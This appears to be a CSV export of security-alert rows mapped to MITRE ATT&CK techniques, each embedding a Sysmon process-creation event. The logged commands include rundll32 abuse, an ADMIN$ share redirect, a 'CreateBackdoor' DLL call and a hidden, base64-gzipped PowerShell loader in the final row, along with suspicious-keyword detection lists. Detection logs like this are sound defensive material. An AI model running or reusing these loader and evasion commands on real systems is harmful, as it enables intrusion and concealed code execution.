<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;cmd.exe&quot; /c notepad.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-2842-5E1E-0000-0020FF3A7A00</Data>
<Data Name=""LogonId"">0x7a3aff</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2842-5E1E-0000-00100C417A00</Data>
<Data Name=""ParentProcessId"">4180</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">rundll32 url.dll,FileProtocolHandler ms-browser://</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556656513.168589,2019-05-01T00:35:13.168589+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656511.61 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:35:12.449839Z"">
</TimeCreated>
<EventRecordID>9833</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:35:12.340</Data>
<Data Name=""ProcessGuid"">365ABB72-B180-5CC8-0000-00102BB71E00</Data>
<Data Name=""ProcessId"">1504</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__1556656511.61 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B17F-5CC8-0000-0020C6A31E00</Data>
<Data Name=""LogonId"">0x1ea3c6</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B17F-5CC8-0000-001082A51E00</Data>
<Data Name=""ParentProcessId"">3572</Data>
<Data Name=""ParentImage"">C:\Windows\System32\mmc.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\mmc.exe -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 url.dll,FileProtocolHandler ms-browser://)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:44:50.353148Z"">
</TimeCreated>
<EventRecordID>336</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:44:50.348</Data>
<Data Name=""ProcessGuid"">747F3D96-2842-5E1E-0000-00100C417A00</Data>
<Data Name=""ProcessId"">4180</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 url.dll,FileProtocolHandler ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-2842-5E1E-0000-0020FF3A7A00</Data>
<Data Name=""LogonId"">0x7a3aff</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2842-5E1E-0000-0010903C7A00</Data>
<Data Name=""ParentProcessId"">1628</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:44:50.353148Z"">
</TimeCreated>
<EventRecordID>336</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:44:50.348</Data>
<Data Name=""ProcessGuid"">747F3D96-2842-5E1E-0000-00100C417A00</Data>
<Data Name=""ProcessId"">4180</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 url.dll,FileProtocolHandler ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-2842-5E1E-0000-0020FF3A7A00</Data>
<Data Name=""LogonId"">0x7a3aff</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2842-5E1E-0000-0010903C7A00</Data>
<Data Name=""ParentProcessId"">1628</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:44:50.353148Z"">
</TimeCreated>
<EventRecordID>336</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:44:50.348</Data>
<Data Name=""ProcessGuid"">747F3D96-2842-5E1E-0000-00100C417A00</Data>
<Data Name=""ProcessId"">4180</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 url.dll,FileProtocolHandler ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-2842-5E1E-0000-0020FF3A7A00</Data>
<Data Name=""LogonId"">0x7a3aff</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2842-5E1E-0000-0010903C7A00</Data>
<Data Name=""ParentProcessId"">1628</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436040.330766,2019-07-30T01:34:00.330766+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace stop ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:58.683059Z"">
</TimeCreated>
<EventRecordID>4950</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:58.370</Data>
<Data Name=""ProcessGuid"">747F3D96-6646-5D3F-0000-0010913A8B00</Data>
<Data Name=""ProcessId"">6232</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c netsh trace stop</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.459240Z"">
</TimeCreated>
<EventRecordID>243558</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.452</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001035972000</Data>
<Data Name=""ProcessId"">1388</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:44:50.353148Z"">
</TimeCreated>
<EventRecordID>336</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:44:50.348</Data>
<Data Name=""ProcessGuid"">747F3D96-2842-5E1E-0000-00100C417A00</Data>
<Data Name=""ProcessId"">4180</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 url.dll,FileProtocolHandler ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-2842-5E1E-0000-0020FF3A7A00</Data>
<Data Name=""LogonId"">0x7a3aff</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2842-5E1E-0000-0010903C7A00</Data>
<Data Name=""ParentProcessId"">1628</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:44:50.353148Z"">
</TimeCreated>
<EventRecordID>336</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:44:50.348</Data>
<Data Name=""ProcessGuid"">747F3D96-2842-5E1E-0000-00100C417A00</Data>
<Data Name=""ProcessId"">4180</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 url.dll,FileProtocolHandler ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-2842-5E1E-0000-0020FF3A7A00</Data>
<Data Name=""LogonId"">0x7a3aff</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2842-5E1E-0000-0010903C7A00</Data>
<Data Name=""ParentProcessId"">1628</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.459240Z"">
</TimeCreated>
<EventRecordID>243558</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.452</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001035972000</Data>
<Data Name=""ProcessId"">1388</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1556656012.371714,2019-05-01T00:26:52.371714+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include ( -c ,[Convert]::FromBase64String,hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden , -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle) in event with Command Line (&quot;powershell.exe&quot; -noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;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&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine (powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVY